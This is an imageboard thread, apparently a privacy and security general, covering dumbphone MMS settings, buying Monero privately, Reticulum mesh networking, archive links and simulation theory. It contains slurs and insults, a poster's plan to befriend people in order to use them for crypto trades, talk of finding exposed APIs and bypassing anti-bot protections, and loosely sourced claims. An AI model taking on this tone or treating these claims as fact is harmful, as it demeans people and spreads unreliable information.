In the past I basically lost my Gmail and Yahoo Mail accounts due to not using a smartphone. The accounts were both the verification for each other and both of the little shits were asking for me to open an email in the other. Couldn't login to either as I hadn't used them in months/years. Called tech support and the real person (sadly replaced with chatgpt months later) texted me a link. Dumbphone couldn't handle the "advanced tech" so she had to re-send it to a smartphone running Android. A thing also failed with that, and I "used up my attempts".

I feel bad that I didn't backup the emails and lost years/decade-old messages. Not so bad as those email addresses had my real name in it and they were services from big tech. Recently I had this problem, same as this as posted in Retarddit:
>https://archive.is/20260507015945/https://old.reddit.com/r/dumbphones/comments/1f19j2o/mms_randomly_not_working_sometimes_on_nokia_2780/%23
>I receive an individual text that says "You received a multimedia message, press Download to retrieve its context before [DATE]." After I select the message and press Download, I receive a "Download Failure" notification that says "There was a problem downloading the message. Please try again." No amount of trying again, restarting the app, or rebooting the phone will ever make the download go through. I get the same message every time.
I was able to make it work by doing this: Settings > Network & Connectivity > Mobile network & data > APN settings > Message settings > change from "T-Mobile" to "T-Mobile MMS".

>>108785465
>Brave is a botnet
Proof? How is it spyware or how does it make people unwittingly join a bad network?

>>108785505
OK shill.
>>
thread is at the bump limit, please migrate
>>108785672
>>108785672
>>108785672
>>
>>108717073
>In the United States are there any privacy-respecting cash<->crypto kiosks?
I looked into this more and it looks like the short answer is no. Choices now:
- Do National-Currency<->Monero at https://xmrbazaar.com/
- Make friends IRL who are willing to let you buy XMR with cash, or you sell then XMR for cash

Two days ago I talked to a "random" IRL woman. She wasn't interested in computers so I dropped that bitch, never talking to her again. If I talk to enough IRL people, eventually I can use them for national currency to Monero and vice versa. Need to befriend them to build up trust.
>>
>>108783756
>>108785679
I didn't hover over that intentionally. It's probably a link to the new thread for this general. Consider using these replacement links for the OP text: >>108690455. If/when you need it, such as when archive.today sadly totally disappears in the future: hoping that happens decades away and not on the scale of months/years in the future. Or if archive.today becomes paywalled or something. Another annoyance with archive.today is that if you open an old tab which has https://archive.is/https://example.com/a/b/c/long/url... then it will change the URL to https://archive.is/ stealing away the full URL in your browser tab >>108690565 and make you solve a fagman captcha to get it back. What if I don't want to solve a captcha just to see the link I had in one of my tabs?

>>108785679
oh, that's the new thread. (guess I won't be there.)
>>
If we're on the topic of sites dying and trying to future proof, having as many backups of the same thing in the OP would be best.
Specifically ones that can be edited after upload.
If one service suddenly dies, then at least one of the others is very likely up for people reading archives (in the future).
The other links can get edited to add new services as and when they come about, and added to OP.
Having one point of failure for a link is very bad.
That includes putting a bunch of links behind another single link, that just moves the point of failure, it doesn't eliminate it.
Redundancy should exist in-thread, not behind a link.
Well, given you want to be future-proofing the thread against site deaths and failures.
Realistically you should have all these things downloaded on SD card(s) in some form anyway, if it interests you.
>>
File: crn_cache_me_outside.jpg (620 KB, 1414x2000)
620 KB JPG
>>108777545
>my trying+failing to allow devices in the same LAN to talk to each other without going through the router
Router = too centralized.

>Isn't [Reticulum] pozzed?
Somewhat like asking "isn't the Internet pozzed?" There's various communities and systems. Some are worse than others. At https://reticulum.world/ "Chicagoland Reticulum Network":
>Come mesh with us! [...] all nerds & protocols are welcome - reticulum, meshcore [+ we'll even tolerate meshtastic]! :] no bigotry \ No fascists, <s>sorry</s>! \ If that offended you, you likely lick boots & we think bootlicking is gross, so stay home -- thx)!

Text I wrote about Reticulum:
>Reticulum = "a networking stack for local and wide-area networks" (Wikipedia). It's the focus of this 2026 video by Data Slayer titled "The Internet, Reinvented.": https://www.youtube.com/watch?v=XTnYVh7K6xQ
>
>One-liner at https://reticulum.network/ is "Reticulum is the cryptography-based networking stack for building local and wide-area networks with readily available hardware. Reticulum can continue to operate even in adverse conditions with very high latency and extremely low bandwidth."
>
>It's a good idea. How does anyone use the Internet nowadays? Someone pays an ISP so users can use their infrastructure. ISPs are centralized communication cartels. The decentralized and distributed solution is for normal people to run infrastructure so computers can network over vast distances across the Earth! With the powerful devices of the now, it's more and more possible.

>>108785713
>>108785719
(Originally these two posts were one post, but this site wouldn't let me do that.)
>>
>>108785760
Two archive.is links in the OP: backup is done. People can locally download them from >>108690455 or the OP using the SingleFile extension or whatever.

Two mega.nz links in the OP. Downloader for the those links:
https://github.com/tonikelope/megabasterd/releases

Sizes:
1. /sec/ PDFs mega.nz link = 8 GB
2. Other library mega.nz link = 0.79 GB

>>108785839
>Chicagoland Reticulum Network
Makes me think they're vile antifas, not some tolerable anti-fascists such as (neo)reactionaries/conservatives.
>>
File: hallowaef.png (1.09 MB, 750x750)
1.09 MB PNG
>>108785839
Previous image they had on their Chicagoland Reticulum Network site in late 2025 was in the cyberpunk genre.

>>108777545
>Reticulum / RNS was created by Mark Qvist. He seems to be incredibly based
Another thing he wrote:
>Fallacy Of The Cloud
>The first step in the Zen of Reticulum is to realize that there is no cloud. There is only other people's computers. When you build for the cloud, you are building for a landlord. You are accepting that your application's existence is conditional on the permission, uptime, and continued goodwill of a central authority.
>
>In Reticulum, you must shift your thinking from "connecting to" to "being among". Reticulum is not a service you subscribe to - it is a fabric you inhabit. There is no "up there". There is only here and there, and the space between them is peer-to-peer. --"Zen of Reticulum"

>>108785585
(Redditors couldn't find a solution to that problem; the solution is what I said with '...change from "T-Mobile" to "T-Mobile MMS".')
>>
File: kgp3d3jp.jpg (94 KB, 640x475)
94 KB JPG
>>108740386
>>108740550
>>>Cyberpunk involves breaking or getting around digital locks and digital restrictions
>>Isn't that hacking?
>Hacking, outside the press, is ambiguous. It can be computer intrusion or clever legal programming.
Hacking is like unauthorized access plus the ability to do malicious things, especially when done over/in more important networks and at more important data/stuff. Downloading and distributing or duplicating web data which has digital restrictions ("anti-bot website" thing I said above in this post) may have an element of unauthorized access or usage, but rarely is there anything malicious about it.

>>108745565
>Getting web pages with anti-bot/anti-scraping/anti-archiving bullshit
Camoufox can also do that:
https://camoufox.com/

>>108784778
I wish I had hardware for mid-to-long-range radio or wifi communications. Part of a collection of stuff which doesn't require the Internet to work (amateur radio, satellites, etc.). Next thing I buy might be another ~20-TB HDD as I have no redundancy on a two-year-old ~20-TB HDD of mine.
>>
File: 9qijvx.jpg (7 KB, 199x253)
7 KB JPG
>>108786129
Correction:
>"anti-bot website" thing I said in this post

Also on the topic of defining things by distinction and falsity, chatgpt said this about cyberpunk:
>prompt: Is Sword Art Online cyberpunk?
>duck.ai: Short answer: No. Sword Art Online (SAO) is primarily sci‑fi with strong virtual-reality and cyberpunk-adjacent elements, but it isn’t classic cyberpunk.
>Why:
>Cyberpunk core themes: high-tech fused with societal decay, pervasive corporate control, antihero protagonists, noir tone, cybernetic augmentation, and commentary on capitalism/urban oppression.
>SAO focuses on VR/MMORPG tech, surviving inside a game, and personal/romantic drama. It emphasizes virtual-world mechanics, social/ethical issues around immersive tech, and action/adventure rather than systemic social collapse or corporate dystopia.
>Elements that feel cyberpunk: advanced neural interfaces (NerveGear, AmuSphere), blurred reality/virtuality, tech-driven identity questions.
>Elements that are not: optimistic/adventurous tone at times, lack of pervasive corporate/city-run dystopia, limited critique of capitalist/social structures, and protagonists who are not typical cyberpunk antiheroes.
>So call SAO “science fiction / virtual-reality drama” with cyberpunk influences, not a straight cyberpunk work

Hegel wrote about falsity refining or defining truth in "Preface to the Phenomenology of Spirit":
>https://www.marxists.org/reference/archive/hegel/works/ph/phprefac.htm#m039
>Truth and falsehood as commonly understood belong to those sharply defined ideas which claim a completely fixed nature of their own, one standing in solid isolation on this side, the other on that, without any community between them. Against that view it must be pointed out, that truth is not like stamped coin that is issued ready from the mint and so can be taken up and used. [...] this very dissimilarity is the process of distinction in general, the essential moment in knowing
>>
File: M4Chy.png (24 KB, 1024x768)
24 KB PNG
>>108786129
>Hacking is like unauthorized access plus the ability to do malicious things, especially when done over/in more important networks and at more important data/stuff.
CVE = Common Vulnerabilities and Exposures. Low-skill hacking would be like finding exposed APIs and WebUIs which shouldn't be exposed. You could use those for bad things like deleting their data. I've found multiple of such exposed things. I didn't delete the users' data as that would be mean and pointless. Internet-exposed stuff = you could get raeped.

I wonder if there's CVEs for certain APIs being exposed. Like you can read about it at some webpage/ID at https://www.cve.org/ that would say "Program XYZ's API or WebUI is exposed on the Internet, you dumbass."

>>108786183
Another idea it's that cyberpunk = "high-tech low life."
>>
I have this video titled "Anonymous Hacks Fox News Live on Air - 2015" from
https://www.youtube.com/watch/ER5iwy8_mro (not deleted so far)

Did this really happen or is it a fake video? I still don't know. The answer is probably a bit of research away. Guy Fawkes anon said "[...]. We are Anonymous. We are legion. We do not forgive. We do not forget."

This video was deleted off of archive.org/details/ because Internet Archive is pozzed. I uploaded the vid here (liberally spending ETH for Arweave uploads for certain reasons):
- meta: https://emilywalker.space/raw/iLz8SMvyr7s0FXRsi0AivVd6y-w0-0Q18UXR_xzEveE
- data: https://hoanminh.site/raw/sq6LT_WDfNlsPHZqi0Dy19O57IzksU5r_HzzSumkF0c

>>108690455
>bunch of Arweave gateways. Some work better than others
flechemano.store also works well.

>>108786183
>www.marxists.org/reference/archive/hegel/works/ph/phprefac.htm
I may disagree ideologically with them, but I like the web design of the marxists.org website. Just plain HTML and stuff. Like I'm looking at some "freetard" or GNU or Linux website.

BTW, if you find my posts annoying or think they're "schizobabble" or "technobabble", keep in mind that you can use a chatbot like duck.ai that will "translate it into plain English" (read: comprehensible to even the dumbest Gen Alpha Amerimutt).
>>
File: toaruos23.png (1.04 MB, 1920x1080)
1.04 MB PNG
>>108786479
>Did this really happen or is it a fake video?
Fake according to
https://www.quora.com/How-did-Anonymous-hack-into-the-live-feed-of-Fox-News

Every alt front-end for that is either walled or rate limited:
https://github.com/zyachel/quetre

>>108747461
>Also it is good to see non-Linux operating systems being developed. Just watch out for PonyOS [based on ToaruOS].
Why? Did PonyOS do something wrong? At least there's two distros of ToaruOS and not just one. More people working on distros = better overall project. Is there any other ToaruOS-based operating system which isn't PonyOS? Fact: best pony is best pony.

Or wait, is the dev of Toaru OS the same person as the dev of Pony OS?

I was reading this https://www.ponyos.org/
>What are people saying about PonyOS?
>you have gone too far this time you fucking pony fags.... \ Anon, from /prog/
>I just can't not believe these guys are sick fucks. Either way, getting to run vim in your shitty furry pedo OS is an accomplishment I must recognize. Fuck this shit. \ Another Anon, from /prog/
>NO \ Mourcore, from reddit's r/technology
>This is gonna buck up my computer so bad. \ mybronyalter-ego, from reddit's r/mylittlepony
>Thanks, but no thanks. \ Nessphoro, from osdev.org
>Oh… Oh god… Make it stop \ @frozendevil [twitter]
>>
>>108778808
>>108778975
Elon Musk said that the chances we are living in base reality is one in one billion. Base reality = non-simulated reality. "High chance" that all humans are living in one of the layers of simulation right now. It's like "The Matrix" or "The Thirteenth Floor", and people are now creating better and better simulations. (Also "Futurama" did an episode of how the universe is like a video game and simulations and so on.)

Reasons to think we are all living in a simulation:
- Statistics
- Quantum mechanics

As to if we are in fact living in a simulation, can't definitely know. The philosophy of external world scepticism, Boltzmann brain, noumena vs. phenomena (Immanuel Kant) is also relevant. I recently watched this "Nobel Prize Just Given for Proving the Universe Isn't Real! {REUPLOAD}":
https://www.youtube.com/watch?app=desktop&v=f_FcbzMt9L8

It's about how the universe isn't locally real and locality is an illusion. The universe responds to information processing / information available (AKA observation) like a video game.



[Advertise on 4chan]

Delete Post: [File Only] Style:
[Disable Mobile View / Use Desktop Site]

[Enable Mobile View / Use Mobile Site]

All trademarks and copyrights on this page are owned by their respective parties. Images uploaded are the responsibility of the Poster. Comments are owned by the Poster.